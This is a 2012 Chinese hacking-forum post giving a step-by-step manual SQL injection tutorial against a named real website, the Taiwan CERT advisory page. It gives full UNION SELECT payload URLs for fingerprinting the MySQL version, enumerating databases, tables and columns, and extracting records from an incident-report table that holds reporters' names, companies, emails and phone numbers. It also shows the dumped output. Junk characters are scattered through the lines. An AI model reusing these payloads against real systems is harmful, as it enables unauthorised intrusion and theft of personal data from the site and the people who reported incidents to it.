找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2157|回复: 0
打印 上一主题 下一主题

.高级暴库方法讲解

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:57:04 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
1 L1 Z. D" w1 }% L& r6 l2 H) U2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
0 N* K' l4 r* O& mhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
0 b8 F) S7 L8 X" O( c# |, Z3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
6 W4 \2 K$ _; x# j数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。* U9 a8 _: r% a* E' _
4.判断有没有写权限
& T1 C# q! V6 d! Ahttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限/ V% m3 ?% m4 s# c$ J
没办法,手动猜表啦- I( a( x4 l% H3 a; G# l/ f
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1' Z; i. C& g: Q8 r
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
% d% d6 {" |; s$ s8 F" l. `http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
' o& f; |8 q  t: p  C: e, c# h' d成功查出所有数据库,国外的黑客就是不一般。数据库如下:9 [. |* d  V/ o7 n& y) B
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb& K, @, C2 u# B' f' a
6.爆表,爆的是twcert库& K8 |( C) _- Y5 [# [8 Q
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
: i" p) a9 p; y' m! L爆出如下表
* d  {) o$ f* y4 P7 Tdownloadfile,irsys,newsdata,secrpt,secrpt_big5
" v& M) Z5 L* @) J7.爆列名,这次爆的是irsys表
' d5 f4 i$ U: y# a% |http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
; `6 G% t- n$ J1 a1 i& E- Z# b爆出如下列, d2 n+ o7 \$ O2 n9 w" K
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status+ k% C8 w  w3 p& M" x, a/ O
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。0 L) K+ L- ?* r- h8 V& }
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--; [* B4 z" M- u1 _) b9 v" e1 f
返回是3,说明每个列里有3个地段/ P1 B( ^+ @0 `- _9 l. ]/ w( p
9.爆字段内容$ L( K+ K( |: V4 m4 T; i1 L
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
2 h2 H4 }% V7 h" M3 B3 s) T  ~; y爆出name列的第一个字段的内容! L$ {; w3 Q4 C: O8 f% J
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
$ t% h+ {% J1 X2 E% Q  t& ]4 D爆出name列的第二个字段的内容
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表